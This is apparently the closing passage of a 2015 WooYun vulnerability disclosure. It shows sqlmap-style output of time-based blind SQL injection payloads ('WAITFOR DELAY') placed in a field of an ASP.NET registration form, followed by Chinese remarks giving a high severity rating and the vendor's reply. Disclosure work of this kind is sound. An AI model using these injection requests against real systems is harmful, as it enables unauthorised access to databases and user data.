C5Lym5pil5pePBQI1MmcQBQnotavlk7Lml48FAjUzZxAFCemXqOW3tOaXjwUCNTRnEAUJ54+e5be05pe
PBQI1NWcQBQnln7ror7rml48FAjU2ZxAFBuWFtuWugwUCOTlnZGQCJQ8QDxYCHwFnFgIfAAUOQ2hhbmd
lX0N0eXBlKCkQFQUJ6Lqr5Lu96K+BCeWGm+WumOivgQbmiqTnhacY5riv44CB5r6z44CB5Y+w6YCa6KG
M6K+BBuWFtuS7lhUFAUEBQgFDAUQBRRQrAwVnZ2dnZ2RkAicPD2QWAh4Fc3R5bGUFMHBhZGRpbmctYm9
0dG9tOjJweDtwYWRkaW5nLXRvcDoycHg7ZGlzcGxheTpub25lO2QCKA8PZBYCHwIFMnBhZGRpbmctYm9
0dG9tOjJweDtwYWRkaW5nLXRvcDoycHg7ZGlzcGxheTppbmxpbmU7ZAJODxAPZBYCHgdvbmNsaWNrBRp
DaGtJc05lZWRJbnZvaWNlX09uY2xpY2soKWRkZAJQDxAPZBYCHwMFEENoYW5nZV9JbnZvaWNlKClkZGQ
CXg8PZA8QFgFmFgEWAh4OUGFyYW1ldGVyVmFsdWVkFgECA2RkAmAPD2QPEBYBZhYBFgIfBGQWAQIDZGQ
YAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFEENoa0lzTmVlZEludm9pY2U9bc+rq/c
I7XLtfV26v/+RuTYkFQ==&UserName=wooyun&PassWord=123456&PassWord2=123456&TrueName=
%E5%BC%A0%E4%B8%89&Sex=01&DropDownList1=1900&DropDownList2=01&DropDownList3=01&N
ation=01&ctypecode=A&code=1&ccode=530126197811213822'; WAITFOR DELAY '0:0:20'--&
Address=33333333333333333333332333&postcode=1000000&homephone=&mobilephone=&EMai
l=&Sel_Invoice=1&CertificationBody=&CertificateNumber=&CertificateRemarks=&Butto
n1=%E7%A1%AE%E3%80%80%E5%AE%9A&__EVENTVALIDATION=/wEWlwIC7NHVsgQCr67qtggCssXgkQ8
C7euahA0C4MWS5g4C//iwrwMC//i0rwMC75fWwg8CtMrm4goCtMrayQ0CtMrOtAQCtMqikw8CtMqW/gc
CtMqKpQ4CtMr+gQECtMrS7AkCtMqGhA8CtMr64AcC2fOIeALZ8/ykCwLZ89CDAgLZ88TuCgLZ87jVDQL
Z86ywBALZ84CfDwLZ8/T7BwLZ86iTBQLZ85z+DQLC5KrXDgLC5J6yAQLC5PKeCALC5OZFAsLk2qALAsL
kzo8CAsLkouoKAsLkltENAsLkym4CwuS+1QsC543NogQC542hiQ8C542V9AcC542J0w4C5439vwEC543
RmggC543FQQLnjbmsCwLnje3FDgLnjcGgAQKIt++5AgKIt8PkCgKIt7fDDQKIt6uuBAKIt5+VDwKIt/P
xBwKIt+fcDgKIt9u7AQKIt4/TBAKIt+O/DwKt2PGUCAKt2OVzAq3Y2d4LAq3YzYUCAq3YoeAKAq3Ylc8
NAq3YiaoEAq3Y/ZYPAq3Yka4CAq3YhZUFAtbBk+IHAtbBh8kOAtbB+7UBAtbB75AIAtbBw38C1sG32gs
C1sGrgQIC1sGf7AoC1sGzhQgC1sGnYAL76rX5DQL76qmkBAL76p2DDwL76vHvBwL76uXKDgL76tmxAQL
76s2cCAL76qF7Avvq1ZAGAvvqyf8OAsyA9bgEAsyA6ecMAsyA3cIHAsyAsakOAsyApZQBAsyAmfMJAsy
AjV4CzIDhugsCzICV0g4CzICJuQEC8amXlgIC8amL/QoC8an/2Q0C8anThAQC8anH4wwC8am7zgcC8am
vtQ4C8amDkAEC8am3qQQC8amrlA8CtcrC4goCtcq2yQ0CtcqqtAQCtcqekw8Ctcry/wcCtcrm2g4Ctcr
agQECtcrO7AkCtcrihQ8CtcrW4AcC3vPkeQLe89ikCwLe88yDAgLe86DuCgLe85TVDQLe84iwBALe8/y
cDwLe89D7BwLe84STBQLe8/j/DQLD5IbXDgLD5PqzAQLD5O6eCALD5MJFAsPktqALAsPkqo8CAsPknuo
KAsPk8tYNAsPkpm4Cw+Sa1QsC5I2pogQC5I2diQ8C5I3x9QcC5I3l0A4C5I3ZvwEC5I3NmggC5I2hQQL
kjZWsCwLkjcnFDgLkjb2gAQKJt8u5AgKJt7/kCgKJt5PDDQKJt4euBAKJt/uKDwKJt+/xBwKJt8PcDgK
Jt7e7AQKJt+vQBAKJt9+/DwKy2O2UCAKOi+mIBgKOi+2IBgKOi9GIBgKOi9WIBgKOi9mIBgKOi92IBgK
Oi8GIBgKOi4WLBgKOi4mLBgKRi+WIBgKRi+mIBgKRi+2IBgKPi+mIBgKPi+2IBgKPi9GIBgKPi9WIBgK
Pi9mIBgKPi92IBgKPi8GIBgKPi4WLBgKPi4mLBgKQi+WIBgKQi+mIBgKQi+2IBgKQi9GIBgKQi9WIBgK
Qi9mIBgKQi92IBgKQi8GIBgKQi4WLBgKQi4mLBgKRi+WIBgKRi+mIBgKRi+2IBgKRi9GIBgKRi9WIBgK
Ri9mIBgKRi92IBgKRi8GIBgKRi4WLBgKRi4mLBgKSi+WIBgKSi+mIBgLfkOyDBALfkOiDBALfkNSDBAL
fkNCDBALfkNyDBALfkNiDBALfkMSDBALfkICABALfkIyABALAkOCDBALAkOyDBALAkOiDBALAkNSDBAL
AkNCDBALAkNyDBALAkNiDBALAkMSDBALAkICABALAkIyABALBkOCDBALBkOyDBALBkOiDBALBkNSDBAL
BkNCDBALBkNyDBALBkNiDBALBkMSDBALBkICABALBkIyABALCkOCDBALCkOyDBALCkOiDBALCkNSDBAL
CkNCDBALCkNyDBALCkNiDBALCkMSDBALCkICABALCkIyABALDkOCDBALDkOyDBALDkOiDBALDkNSDBAL
DkNCDBALDkNyDBALDkNiDBALDkMSDBALDkICABALDkIyABALEkOCDBALEkOyDBALEkOiDBALEkNSDBAL
EkNCDBALEkNyDBALEkNiDBALYkIyABALwma/gAQLxma/gAQLyma/gAQLzma/gAQL0ma/gAQKzmc2yBwL
H/JboCALLodLgCAL02YLJCwKyzbarBQLn/NCJCQKS18akDQKV3vz2BAKWoNX1AwKXoNX1AwKXkJhuAuf
enLMMArTggvIPApDzhP8LAoznisYGXG134iWB2jIDpyvH2waGRx1EeqQ=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTY5NjY2ODk2OA9
kFgICAw9kFhYCGw8QD2QWAh4Ib25jaGFuZ2UFFlNlbGVjdFllYXJXaGVuTW9udGgyKCkPFpcBZgIBAgI
CAwIEAgUCBgIHAggCCQIKAgsCDAINAg4CDwIQAhECEgITAhQCFQIWAhcCGAIZAhoCGwIcAh0CHgIfAiA
CIQIiAiMCJAIlAiYCJwIoAikCKgIrAiwCLQIuAi8CMAIxAjICMwI0AjUCNgI3AjgCOQI6AjsCPAI9Aj4
CPwJAAkECQgJDAkQCRQJGAkcCSAJJAkoCSwJMAk0CTgJPAlACUQJSAlMCVAJVAlYCVwJYAlkCWgJbAlw
CXQJeAl8CYAJhAmICYwJkAmUCZgJnAmgCaQJqAmsCbAJtAm4CbwJwAnECcgJzAnQCdQJ2AncCeAJ5Ano
CewJ8An0CfgJ/AoABAoEBAoIBAoMBAoQBAoUBAoYBAocBAogBAokBAooBAosBAowBAo0BAo4BAo8BApA
BApEBApIBApMBApQBApUBApYBFpcBEAUEMTkwMAUEMTkwMGcQBQQxOTAxBQQxOTAxZxAFBDE5MDIFBDE
5MDJnEAUEMTkwMwUEMTkwM2cQBQQxOTA0BQQxOTA0ZxAFBDE5MDUFBDE5MDVnEAUEMTkwNgUEMTkwNmc
QBQQxOTA3BQQxOTA3ZxAFBDE5MDgFBDE5MDhnEAUEMTkwOQUEMTkwOWcQBQQxOTEwBQQxOTEwZxAFBDE
5MTEFBDE5MTFnEAUEMTkxMgUEMTkxMmcQBQQxOTEzBQQxOTEzZxAFBDE5MTQFBDE5MTRnEAUEMTkxNQU
EMTkxNWcQBQQxOTE2BQQxOTE2ZxAFBDE5MTcFBDE5MTdnEAUEMTkxOAUEMTkxOGcQBQQxOTE5BQQxOTE
5ZxAFBDE5MjAFBDE5MjBnEAUEMTkyMQUEMTkyMWcQBQQxOTIyBQQxOTIyZxAFBDE5MjMFBDE5MjNnEAU
EMTkyNAUEMTkyNGcQBQQxOTI1BQQxOTI1ZxAFBDE5MjYFBDE5MjZnEAUEMTkyNwUEMTkyN2cQBQQxOTI
4BQQxOTI4ZxAFBDE5MjkFBDE5MjlnEAUEMTkzMAUEMTkzMGcQBQQxOTMxBQQxOTMxZxAFBDE5MzIFBDE
5MzJnEAUEMTkzMwUEMTkzM2cQBQQxOTM0BQQxOTM0ZxAFBDE5MzUFBDE5MzVnEAUEMTkzNgUEMTkzNmc
QBQQxOTM3BQQxOTM3ZxAFBDE5MzgFBDE5MzhnEAUEMTkzOQUEMTkzOWcQBQQxOTQwBQQxOTQwZxAFBDE
5NDEFBDE5NDFnEAUEMTk0MgUEMTk0MmcQBQQxOTQzBQQxOTQzZxAFBDE5NDQFBDE5NDRnEAUEMTk0NQU
EMTk0NWcQBQQxOTQ2BQQxOTQ2ZxAFBDE5NDcFBDE5NDdnEAUEMTk0OAUEMTk0OGcQBQQxOTQ5BQQxOTQ
5ZxAFBDE5NTAFBDE5NTBnEAUEMTk1MQUEMTk1MWcQBQQxOTUyBQQxOTUyZxAFBDE5NTMFBDE5NTNnEAU
EMTk1NAUEMTk1NGcQBQQxOTU1BQQxOTU1ZxAFBDE5NTYFBDE5NTZnEAUEMTk1NwUEMTk1N2cQBQQxOTU
4BQQxOTU4ZxAFBDE5NTkFBDE5NTlnEAUEMTk2MAUEMTk2MGcQBQQxOTYxBQQxOTYxZxAFBDE5NjIFBDE
5NjJnEAUEMTk2MwUEMTk2M2cQBQQxOTY0BQQxOTY0ZxAFBDE5NjUFBDE5NjVnEAUEMTk2NgUEMTk2Nmc
QBQQxOTY3BQQxOTY3ZxAFBDE5NjgFBDE5NjhnEAUEMTk2OQUEMTk2OWcQBQQxOTcwBQQxOTcwZxAFBDE
5NzEFBDE5NzFnEAUEMTk3MgUEMTk3MmcQBQQxOTczBQQxOTczZxAFBDE5NzQFBDE5NzRnEAUEMTk3NQU
EMTk3NWcQBQQxOTc2BQQxOTc2ZxAFBDE5NzcFBDE5NzdnEAUEMTk3OAUEMTk3OGcQBQQxOTc5BQQxOTc
5ZxAFBDE5ODAFBDE5ODBnEAUEMTk4MQUEMTk4MWcQBQQxOTgyBQQxOTgyZxAFBDE5ODMFBDE5ODNnEAU
EMTk4NAUEMTk4NGcQBQQxOTg1BQQxOTg1ZxAFBDE5ODYFBDE5ODZnEAUEMTk4NwUEMTk4N2cQBQQxOTg
4BQQxOTg4ZxAFBDE5ODkFBDE5ODlnEAUEMTk5MAUEMTk5MGcQBQQxOTkxBQQxOTkxZxAFBDE5OTIFBDE
5OTJnEAUEMTk5MwUEMTk5M2cQBQQxOTk0BQQxOTk0ZxAFBDE5OTUFBDE5OTVnEAUEMTk5NgUEMTk5Nmc
QBQQxOTk3BQQxOTk3ZxAFBDE5OTgFBDE5OThnEAUEMTk5OQUEMTk5OWcQBQQyMDAwBQQyMDAwZxAFBDI
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
mi4nml48FAjM1ZxAFCeavm+mavuaXjwUCMzZnEAUJ5Luh5L2s5pePBQIzN2cQBQnplKHkvK/ml48FAjM
4ZxAFCemYv+aYjOaXjwUCMzlnEAUJ5pmu57Gz5pePBQI0MGcQBQzloZTlkInlhYvml48FAjQxZxAFBua
AkuaXjwUCNDJnEAUP5LmM5YW55Yir5YWL5pePBQI0M2cQBQzkv4TnvZfmlq/ml48FAjQ0ZxAFDOmEgua
4qeWFi+aXjwUCNDVnEAUJ5b635piC5pePBQI0NmcQBQnkv53lronml48FAjQ3ZxAFCeijleWbuuaXjwU
CNDhnEAUG5Lqs5pePBQI0OWcQBQzloZTloZTlsJTml48FAjUwZxAFCeeLrOm+meaXjwUCNTFnEAUM6YS
C5Lym5pil5pePBQI1MmcQBQnotavlk7Lml48FAjUzZxAFCemXqOW3tOaXjwUCNTRnEAUJ54+e5be05pe
PBQI1NWcQBQnln7ror7rml48FAjU2ZxAFBuWFtuWugwUCOTlnZGQCJQ8QDxYCHwFnFgIfAAUOQ2hhbmd
lX0N0eXBlKCkQFQUJ6Lqr5Lu96K+BCeWGm+WumOivgQbmiqTnhacY5riv44CB5r6z44CB5Y+w6YCa6KG
M6K+BBuWFtuS7lhUFAUEBQgFDAUQBRRQrAwVnZ2dnZ2RkAicPD2QWAh4Fc3R5bGUFMHBhZGRpbmctYm9
0dG9tOjJweDtwYWRkaW5nLXRvcDoycHg7ZGlzcGxheTpub25lO2QCKA8PZBYCHwIFMnBhZGRpbmctYm9
0dG9tOjJweDtwYWRkaW5nLXRvcDoycHg7ZGlzcGxheTppbmxpbmU7ZAJODxAPZBYCHgdvbmNsaWNrBRp
DaGtJc05lZWRJbnZvaWNlX09uY2xpY2soKWRkZAJQDxAPZBYCHwMFEENoYW5nZV9JbnZvaWNlKClkZGQ
CXg8PZA8QFgFmFgEWAh4OUGFyYW1ldGVyVmFsdWVkFgECA2RkAmAPD2QPEBYBZhYBFgIfBGQWAQIDZGQ
YAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFEENoa0lzTmVlZEludm9pY2U9bc+rq/c
I7XLtfV26v/+RuTYkFQ==&UserName=wooyun&PassWord=123456&PassWord2=123456&TrueName=
%E5%BC%A0%E4%B8%89&Sex=01&DropDownList1=1900&DropDownList2=01&DropDownList3=01&N
ation=01&ctypecode=A&code=1&ccode=530126197811213822' WAITFOR DELAY '0:0:20'--&A
ddress=33333333333333333333332333&postcode=1000000&homephone=&mobilephone=&EMail
=&Sel_Invoice=1&CertificationBody=&CertificateNumber=&CertificateRemarks=&Button
1=%E7%A1%AE%E3%80%80%E5%AE%9A&__EVENTVALIDATION=/wEWlwIC7NHVsgQCr67qtggCssXgkQ8C
7euahA0C4MWS5g4C//iwrwMC//i0rwMC75fWwg8CtMrm4goCtMrayQ0CtMrOtAQCtMqikw8CtMqW/gcC
tMqKpQ4CtMr+gQECtMrS7AkCtMqGhA8CtMr64AcC2fOIeALZ8/ykCwLZ89CDAgLZ88TuCgLZ87jVDQLZ
86ywBALZ84CfDwLZ8/T7BwLZ86iTBQLZ85z+DQLC5KrXDgLC5J6yAQLC5PKeCALC5OZFAsLk2qALAsLk
zo8CAsLkouoKAsLkltENAsLkym4CwuS+1QsC543NogQC542hiQ8C542V9AcC542J0w4C5439vwEC543R
mggC543FQQLnjbmsCwLnje3FDgLnjcGgAQKIt++5AgKIt8PkCgKIt7fDDQKIt6uuBAKIt5+VDwKIt/Px
BwKIt+fcDgKIt9u7AQKIt4/TBAKIt+O/DwKt2PGUCAKt2OVzAq3Y2d4LAq3YzYUCAq3YoeAKAq3Ylc8N
Aq3YiaoEAq3Y/ZYPAq3Yka4CAq3YhZUFAtbBk+IHAtbBh8kOAtbB+7UBAtbB75AIAtbBw38C1sG32gsC
1sGrgQIC1sGf7AoC1sGzhQgC1sGnYAL76rX5DQL76qmkBAL76p2DDwL76vHvBwL76uXKDgL76tmxAQL7
6s2cCAL76qF7Avvq1ZAGAvvqyf8OAsyA9bgEAsyA6ecMAsyA3cIHAsyAsakOAsyApZQBAsyAmfMJAsyA
jV4CzIDhugsCzICV0g4CzICJuQEC8amXlgIC8amL/QoC8an/2Q0C8anThAQC8anH4wwC8am7zgcC8amv
tQ4C8amDkAEC8am3qQQC8amrlA8CtcrC4goCtcq2yQ0CtcqqtAQCtcqekw8Ctcry/wcCtcrm2g4Ctcra
gQECtcrO7AkCtcrihQ8CtcrW4AcC3vPkeQLe89ikCwLe88yDAgLe86DuCgLe85TVDQLe84iwBALe8/yc
DwLe89D7BwLe84STBQLe8/j/DQLD5IbXDgLD5PqzAQLD5O6eCALD5MJFAsPktqALAsPkqo8CAsPknuoK
AsPk8tYNAsPkpm4Cw+Sa1QsC5I2pogQC5I2diQ8C5I3x9QcC5I3l0A4C5I3ZvwEC5I3NmggC5I2hQQLk
jZWsCwLkjcnFDgLkjb2gAQKJt8u5AgKJt7/kCgKJt5PDDQKJt4euBAKJt/uKDwKJt+/xBwKJt8PcDgKJ
t7e7AQKJt+vQBAKJt9+/DwKy2O2UCAKOi+mIBgKOi+2IBgKOi9GIBgKOi9WIBgKOi9mIBgKOi92IBgKO
i8GIBgKOi4WLBgKOi4mLBgKRi+WIBgKRi+mIBgKRi+2IBgKPi+mIBgKPi+2IBgKPi9GIBgKPi9WIBgKP
i9mIBgKPi92IBgKPi8GIBgKPi4WLBgKPi4mLBgKQi+WIBgKQi+mIBgKQi+2IBgKQi9GIBgKQi9WIBgKQ
i9mIBgKQi92IBgKQi8GIBgKQi4WLBgKQi4mLBgKRi+WIBgKRi+mIBgKRi+2IBgKRi9GIBgKRi9WIBgKR
i9mIBgKRi92IBgKRi8GIBgKRi4WLBgKRi4mLBgKSi+WIBgKSi+mIBgLfkOyDBALfkOiDBALfkNSDBALf
kNCDBALfkNyDBALfkNiDBALfkMSDBALfkICABALfkIyABALAkOCDBALAkOyDBALAkOiDBALAkNSDBALA
kNCDBALAkNyDBALAkNiDBALAkMSDBALAkICABALAkIyABALBkOCDBALBkOyDBALBkOiDBALBkNSDBALB
kNCDBALBkNyDBALBkNiDBALBkMSDBALBkICABALBkIyABALCkOCDBALCkOyDBALCkOiDBALCkNSDBALC
kNCDBALCkNyDBALCkNiDBALCkMSDBALCkICABALCkIyABALDkOCDBALDkOyDBALDkOiDBALDkNSDBALD
kNCDBALDkNyDBALDkNiDBALDkMSDBALDkICABALDkIyABALEkOCDBALEkOyDBALEkOiDBALEkNSDBALE
kNCDBALEkNyDBALEkNiDBALYkIyABALwma/gAQLxma/gAQLyma/gAQLzma/gAQL0ma/gAQKzmc2yBwLH
/JboCALLodLgCAL02YLJCwKyzbarBQLn/NCJCQKS18akDQKV3vz2BAKWoNX1AwKXoNX1AwKXkJhuAufe
nLMMArTggvIPApDzhP8LAoznisYGXG134iWB2jIDpyvH2waGRx1EeqQ=
---

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-01 10:57

厂商回复:

安排人员排查

最新状态:

暂无